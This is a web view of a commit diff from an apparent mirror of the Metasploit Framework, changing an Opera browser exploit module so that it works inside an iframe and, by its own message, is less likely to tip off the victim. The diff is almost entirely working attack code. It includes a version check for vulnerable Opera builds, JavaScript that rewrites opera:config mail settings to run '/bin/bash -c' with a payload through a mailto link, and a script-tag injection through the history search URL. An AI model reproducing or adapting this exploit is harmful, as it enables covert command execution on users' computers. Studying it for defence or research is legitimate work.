infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

make opera_historysearch work in an iframe and speed it up so it is less likely to tip off a user 

git-svn-id: file:///home/svn/framework3/trunk@6915 4d416f70-5f16-0410-b530-b9f4589650da
unstable
James Lee 2009-07-28 11:08:50 +00:00
parent 9080dd1f0d
commit c29af0197a
1 changed files with 14 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/multi/browser/opera_historysearch.rb
View File

@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
:ua_name => HttpClients::OPERA, :ua_name => HttpClients::OPERA,
:javascript => true, :javascript => true,
:rank => ExcellentRanking, # reliable command execution :rank => ExcellentRanking, # reliable command execution
:vuln_test => nil, :vuln_test => %Q{
v = parseFloat(opera.version());
if (9.5 < v && 9.62 > v) {
is_vuln = true;
}
},
}) })
def initialize(info = {}) def initialize(info = {})
@ -115,7 +120,6 @@ class Metasploit3 < Msf::Exploit::Remote
s.src="opera:config"; s.src="opera:config";
s.id="config_window"; s.id="config_window";
document.body.appendChild(s); document.body.appendChild(s);
setTimeout(function () {location.href='about:blank'},1000);
config_window.eval( config_window.eval(
"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" + "var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
"old_app = opera.getPreference('Mail','External Application');" + "old_app = opera.getPreference('Mail','External Application');" +
@ -124,11 +128,11 @@ class Metasploit3 < Msf::Exploit::Remote
"opera.setPreference('Mail','Handler','2');" + "opera.setPreference('Mail','Handler','2');" +
"app_link = document.createElement('a');" + "app_link = document.createElement('a');" +
"app_link.setAttribute('href', 'mailto:a@b.com');" + "app_link.setAttribute('href', 'mailto:a@b.com');" +
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},500);" +
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},500);" +
"setTimeout(function () {location.href='about:blank'},500);" +
"app_link.click();" + "app_link.click();" +
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
""); "");
setTimeout(function () {window.location='about:blank'},1);
} }
when /[?]history/ when /[?]history/
@ -148,10 +152,12 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}") print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")
js = %Q^ js = %Q^
window.onload = function() { var wnd = window;
url = location.href; while (wnd.parent != wnd) {
location.href = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--"; wnd = wnd.parent;
} }
url = location.href;
wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
^ ^
content = %Q^ content = %Q^
#{html_hdr} #{html_hdr}